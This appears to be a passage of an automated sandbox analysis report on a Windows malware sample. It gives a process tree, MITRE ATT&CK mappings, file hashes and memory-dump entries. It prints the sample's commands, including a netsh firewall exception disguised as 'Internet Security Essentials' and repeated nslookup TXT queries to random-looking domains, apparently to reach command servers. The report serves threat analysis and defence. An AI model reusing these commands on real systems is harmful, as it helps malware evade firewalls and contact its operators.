  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2088
- - C:\Windows\SysWOW64\wbem\mofcomp.exe
    "C:\Windows\System32\wbem\mofcomp.exe" "C:\Users\Admin\AppData\Local\Temp\856.mof"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1220
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe" "Internet Security Essentials" ENABLE
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1512
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3020
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:888
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1928
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.net 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1744
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.com 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1756
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.net 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:844
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.com 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1500
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt fimqqxd901eirwa.net 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2920
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1300
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2584
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2032
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.net 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1080
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.com 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1516
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.net 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1556
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.com 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:616
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt hpvzahpqz1326bei.net 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:264
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2284
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2440
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1884
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.net 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1700
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.com 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2896
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.net 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2220
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.com 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2860
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt ff85kszciilnsae.net 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
387B

MD5
59434a7093908781c9f354e8d877e44a

SHA1
83ce9d34b0785257a9d4d4df2bafd95e82e042b2

SHA256
2692f146379556cb596df4cdbfe628bb19b16f6df9506456e47965cbbd7f5ce3

SHA512
3216edb560bfa3569d6f21799df54baff2871100af9bc2cfb1fcd912fba982fd3e45d1a839e4ea28017b04db1dedb9b1829d01f812be3de96ac31d740d66b385

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
917B

MD5
4b6c47551ead2337ed9946c1951dcc26

SHA1
a2c2ef7351ddb16eeaa56ce93a68de53758d3a52

SHA256
d1f17b9f797fd8b164d9f89ec878e5ca0d70f0bbacc8e728aceb21248056b3ea

SHA512
17b2ae054f72cf0ef3d347ad98ab6f5f3527707fa781237bbb405a0fcbb5fefa6d2d47f481d02daa5d1d640f436919e9532ca62d8886a495280aa2162840c036

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
1KB

MD5
1be1c7abf748ffabd5ae1d1c95676b4e

SHA1
dffb67890ae2c22b28128e743f7e5f438d3bf052

SHA256
b70469bda3306ff93a8524727b9cd37718736f7dea04d61181f2f4f96c536cc4

SHA512
5eade814d81a372ef6540e312a11afa30a6bbaea5d1632ec50df2533804237d360e2f96f747674ded20fba2a29e65f0d370cecd813f16b15d3addf3384b03847

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
1KB

MD5
f07c63ea44e7134d1bfc6a7ca1fd436b

SHA1
7450443285dd0db181463f413255defd1c3f0fe0

SHA256
fd24b5181dbe248a5ef8026ec147e60976ea6b69e2ea72f189bee0da62a58d4e

SHA512
4c45c1bb2681f10074518113dded3e50b6ac9991c277202895b2c1254fedec3861e1822f079338e4ba98d1658e48beaf4b4f4b50da0ec464d19c1ee62717a01d

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
185B

MD5
b8224e5293d4fad1927c751cc00c80e7

SHA1
270b8c752c7e93ec5485361fe6ef7b37f0b4513b

SHA256
c47da9be4fc4d757add73c49654c9179067af547d0cc758d6356e2955bbfcb61

SHA512
8fed9a509e46319529145fa2159251e43040d26080af84e44badaab1dd339c767ff75a2c473bc0abfb448b03beb96718ee34ba6bc150ed3085322878b55a22f2

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
2KB

MD5
31d7e8ea9a298573ee23eb75100c1b18

SHA1
c36b8ec50c2c4b0e0a981ebc95de9a60650d7532

SHA256
ace30f2d024dd13b1a25ff9ddd38fb642dcbdd3dd3d522e1d2cc5c187a7098a5

SHA512
5a1fa2ec234f69b3a60bcc54a1eaf79fcbf2de26093aac560439a12bbbcbe45d1bb0c1b7c87ce12bece7647c401ba5c5863795f890b7738587c2dcc7fc4bec87

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
2KB

MD5
61256911ce10b059830d68668e7514ca

SHA1
2898332be4d1bbc5b4309d362792251fc3bfb8bb

SHA256
18e2ccb50471b7fe4854b2495c31136a804832f35e939d27b9b4318925ccca61

SHA512
cb860bf26e936c6491253cdb0d53799cae54842371c1ed026f642736bcedb9a10db6dd64dce6fb0c2cfacd75b0dfa02350da244156784b015bde2ba9b104c0ff

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
2KB

MD5
53df5e3bb636db32c82724175362e0f9

SHA1
b00dd98eeb07e40ac8d1e58b0915217c314a167a

SHA256
233d51032b095a1d42857d34e075134c4816951250a53d1b628a3bc90e614af0

SHA512
c80c0fb348156be036fb88d1456d3401c52f7c660a03a8154d352b25ec03ffc644b20c9768eeeea40c9c00d50db9c4f9e266f11a85ce2d7c9810cdc216777459

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
3KB

MD5
31df8fdb374207e530e40f8bb65d0514

SHA1
7ad0a5e5df77fe6501bd68377eeefeedeb79f8c4

SHA256
4094cb52e8225e45912eddd572553def5f6407e7ac412c56724386c564d99c6e

SHA512
95f89949a0f0737a53f8c76a6004ed9660b01bed81e6c7bfc30cea5eff96850cb93afb13e6768fff6c0f88dfc255f6992c83bc3935d8179dd487b0fb29fcf7de

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
4KB

MD5
1a93ea1b6fd94d7e954aeb592516a8cf

SHA1
ee30402a30ec46c89a186d9f372d4f0a5ed02f68

SHA256
a3709592be50b7fa934fdb47b59e78d67469f26e7acfe7d525ce7d8945e241b7

SHA512
87b8ce287a64eaab1bfab747882eb7cfae21053f9db8839c5237773787b039b457819305b8ed9534421e955c3694888139991f4a0646e193ed8200b85dde3fc1

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
5KB

MD5
ddf397660149350f81682242dda35e84

SHA1
c9f24bb4608d5ba2471525e25ae4f3673621265a

SHA256
01486fc6369739da8f57ad94becc9e7183a682a740acd2ba47c0d5e213219f79

SHA512
1b70a5f8e00aa83d0e5c6df1364c0007fd35c7bfff44878c8972ed4fa95547de93df4565e64f80c1fba2cfd647b1d05862de199225cf196acb483d4db555afb8

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
7KB

MD5
66c97a3e9569003f60d569f1f081b2e6

SHA1
9aa260529b47d40406879952805505dfa3a341b6

SHA256
87d3f9c4a80c97dcd81988a8c808d25ee365c40bf62d4293d8fea27c6389aece

SHA512
174b229f305706e1857c1342e65426e72a0d3fb2486e43acc38e295d25f6e5829612de62a6a9ed6ef4060258472abee04067f7dba9e2af48f9a04d3db72c9f2b

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
7KB

MD5
0d75ba1f97acded97940bbf0f0f0a48d

SHA1
864bf494b7deda4d40b7c142c056f797610867c6

SHA256
bfcc66c8fb21d8b7e734cad81f52519deeccfc7df2509a4eb095d74c069ab590

SHA512
b7020d2fee3f11a0c14b1467ebb032298d37a148be182e98ac1338ca4514cc886843d8343f0bfd57624d5a2d65143ac449a8cd8ca1524bc5b29fce8e825a83c2

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
8KB

MD5
241a1abb3cc9a2946b2f34efc4ce2e95

SHA1
488250a0bdac30c632bb1c61d88daa7a214a0e6f

SHA256
f7f7374daf21f2d74000b021063287ae9f894e1fc7a735abe02bd57daddb8b8f

SHA512
726e00e853cc16ad537961afbd650eecdeef2853a6a75bff27647f98a51debe5d363239a6d2a991f1f676b304a496dba6a6fc8ef1311525f3b3dc369cc5fea41

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
9KB

MD5
cddc5399a5f08a3454eec4e939b9adec

SHA1
9927db935968a40bfcd3606238169b56e8922060

SHA256
ed07a0996154d050715b163367d638091e38d0dcd2b289ced87ae115a15de7a4

SHA512
674c75aa4faaf79bb3b3b7693f4bfb98b8b953dc30345c20e20faebfecaf922673cb833dcd7d9af6666bdebe04a9c8e5e3978883600b16d78f42bb39dc80b496

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
9KB

MD5
e9a4e6c6c0e8265d4ba969aafd4a168d

SHA1
a1af346c5b8b27845ff5c9d1f4bad686365c3476

SHA256
c0b9c7c67f645801686a250392654c311685056f6ec949f99275a8105cec2f66

SHA512
b04b0a99072fd5cd1d3aad701458a08182bc4afe219bccef54d12a439fcd71c8d59650077b21ada03b4c2c5d5f5aae4c469535c0623ab6bdd8ed465ab81a6157

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
11KB

MD5
7a6d2e6795830bc049bf4f4dcb64e2d4

SHA1
ed914b0fb6f776db30a23c8e749ce673956615ce

SHA256
1018b7fa490f4be0c3994a4bbc35fd0d920b825a6ef68fa93259b6e83f15cb49

SHA512
2dcb06d6ac50f84528871f83ec3533dd2ebcb8a2017aa1c1f2e5618aea89c1e85fb53d3c6f47c181ee54191f6ddfd79e9c6677cc10f3a022434b309c5f28ff3b

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
12KB

MD5
3f5af51add5330a6bbf0b0151a60d83e

SHA1
65e5aeaf39bd2a41513a0894495be79a7ef03311

SHA256
ed69ae1e0aeac23d99cff8d1e6073b56ea7fcf8b2847dce31411d1b0bdae44cf

SHA512
cffcfafe07ed4602704b911d5774b397f202b896e799329d3b49cc5e6405ae9a9db12b5eca0e8d9314311da2b7ea6d5e9cfd0dd24723ef580512c04b7a584fc7

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
12KB

MD5
b9e48ba0301d17f3ee9a518730b7f833

SHA1
87e88765c393c603ecf2ae529fa28374e6e96d56

SHA256
12dacf9f259d9e5d95dc4b6e2b339c77369b9a08ba5c13488fac48d3251dea68

SHA512
40bbae414039c6b6f142a32d6dee6bdfe56b3389d64bdb10affb6a536e76acad2626d62f49707c2308127ecb96f977aa43c5cab1051b9bfa03041988274523c5

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
13KB

MD5
b289399ca9620a5eda1e266fad2e3f08

SHA1
d18e870f02eab5310f007ea8459536db67428e29

SHA256
b7778fb92f5a9f4558c7e28ee51832a1dfc6341361e03beed56d787da6747f5e

SHA512
84c30eb7d29cd31e9fff3fcb0bff3273d797d850464da1378662d12c3aff9c9e79c269a30642fd287c530dddd16744a80e0660a489e4f9f55e22809190631c48

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
14KB

MD5
5a7781d9e7c8e329af1dccf44747fdb0

SHA1
ad1e1090b0b7a77027ae6c4b03b8fe3bc03a3184

SHA256
b8859dd617996812a5bcc2d36f1f787894f130171231d623bb11b8a483bdfbfd

SHA512
196e82aa22bb768a65b3d3dada50caeeb34d535f42532071582fd6df5a0ff6256de69a4a5761f8d5fd5173246af6811653f2e0bd35045ce213b47673908beb69

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
14KB

MD5
68544dca884b15343a141e1a9bb0ce1f

SHA1
3e3f582080fee08d0c5b28aed94809bdef79f057

SHA256
0d7bb7a6dcc71928d19c0dccb633812d091d2bb1a1612614ed0bf98f62726cf7

SHA512
0d72f4403f51e4d0031ee5f8eaf4bd4ad325f8fbbd8e4e805b613cd199a896161e15750e1166e55559971790d97b8aa8554d3750ddd69af91b24d12821a55775

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
15KB

MD5
86d684c2d34129d755ef9f960d96e198

SHA1
030f735eed3759f85f5b47877ae9575bc75b7417

SHA256
bec4f11e95e5a38ef889d6d0faa69b88360dddfe7719e9646319ae6ea5478e1f

SHA512
bc2482fdd3cb660ff824c61a18d86f79e46d15a80448cc4bef0422296085f981c3f0053eacafc930cded3a88af6765946f9c7c4cde5daf1ffbda9bc307bed8f1

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
16KB

MD5
f8f2e873e3a88db0877b731da073ecd8

SHA1
457e6fa110f069bbd25e5ae837062543d5b68984

SHA256
e1b904d2e744bf57e825182ecf3a1efab06f0e4c2b5306cf75c3830e00b87735

SHA512
e122c5df394912a44425fd93ff2da5b7112f509714a404b6d9b3472cbedc11b69b768ace5d2492710fd2b424ebfd89e5924d5ec94d62eeda7902bc382de5a9bf

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
16KB

MD5
abfa7c8f6231c332a1a4ad6e3df052db

SHA1
4370c81c908d640ef164a668dd8ecb2fc84d007d

SHA256
18ec0c2e953549cfb3e479a221f126199e631cee858a8ac3173ddc02eb7fb6ed

SHA512
4675b6ace3c291ff19438828495b5416fc20ce98a7eb1adde176b190207f939928b1d68fbe064e92d42ba1e397273cdaab1544bbff36c2195f6a0b9740085990

Download Submit
C:\ProgramData\ISYGJE\ISHCE.cfg

Filesize
16KB

MD5
9d942e7cfb6223e03bbdd70a30fac73c

SHA1
138888d35d0656ffd381261c56d6d710c17a3fc3

SHA256
208d6bad2c1aa05c67daa78e91cf75d839978a0b1b1ee73ee7c16959c9cef866

SHA512
f873a15a0c6c5f5928f919d81a3b95738abbe78a17d94ce76c97266ea433e94a2b2e96eb95aef513c9792684e01c56e7cb3695d80fb13668756c4efc51fd0a6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\856.mof

Filesize
354B

MD5
fa519fd5ef9898152a14b517a0bb15fa

SHA1
c251aca894d31c04d2fe9a1f1198a820dae9f1f1

SHA256
bfe6e999511b585343adcfe42b4013ee5463b2c4fceb5f0b6b1840aa0d2a9719

SHA512
3c004f5f604ccfa576e5c9b666c930c7fefe4cdc8c1549c29d6e2609aab03a4abd22862bd3d74aa00ca66c75ccb327b9557940a8e48571e3b7f6b51c5a7c9454

Download Submit
C:\Windows\System32\drivers\etc\host_new

Filesize
1006B

MD5
29fb989ad4af25ca439bc6567858484d

SHA1
3be9db2d3302ed1b22d59f3e9efc7e1396c3f9fe

SHA256
04bb5af047d20da4eab57f87a3a679dc2d64984b18ddaaed4ae747301d73b23e

SHA512
bd1ccde84e140fe397faceeb26c6da5f4cb83c318c579176e8668680cb32bc0fe8a2afbc2ad4235f8428dc64e3844ad7b3a738f322f12d6223c69b6deacebeb4

Download Submit
C:\Windows\System32\drivers\etc\host_new

Filesize
977B

MD5
53316bc0c42b9d65743709021f1d03c7

SHA1
44cfe377bf7fedee2ce8f888cfacefd283e924e6

SHA256
600d914eb6b9ffb387be5b7300ca138192a4e86c4679c9bff36bcf0364e74b36

SHA512
9b390f6d7955413c8d63d02dff6988442cf78bbfb72e12f7deab56b190c1a7f455c5af3344ee5a1f7477d383c24e567af4fb7639ab6d9f014935418bf1cf00f6

Download Submit
\ProgramData\9816f\ISba6.exe

Filesize
2.6MB

MD5
eeb864d76675ad5171e9c9b0373b0620

SHA1
0a09d65356f41e62f25d6709b619d293096c3afd

SHA256
07a6b264f4c2b652f76a7bc65b19d4a4590bf38ed7bc5d8befdc014040210719

SHA512
6e298c0aee1c02d2a0ca8b384a34400a12a9505fcc4138dc143ff6f0e1723e7a10a7ba2121fdf1157e461c927b7330618ab652defbf7cfe82bf406eff6cf4939

Download Submit
memory/2088-320-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-255-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-382-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-381-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-352-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-360-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-387-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-385-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-324-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-400-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-401-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-303-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-329-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-427-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-3-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-448-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2088-449-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-450-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-451-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-453-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-455-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-457-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-456-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-458-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-267-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-266-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-489-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-490-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-491-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-492-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-265-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-359-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-258-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-523-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-524-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-525-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-248-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-249-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-250-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-247-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-7-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-9-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2088-6-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-8-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-0-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-635-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-637-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-723-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-645-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-647-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-646-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-658-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-656-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-649-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-671-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-670-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-1-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2088-660-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-720-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-722-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2088-721-0x0000000013140000-0x0000000013746000-memory.dmp

Filesize
6.0MB

Download
memory/2984-5-0x0000000000400000-0x00000000006A6000-memory.dmp

Filesize
2.6MB

Download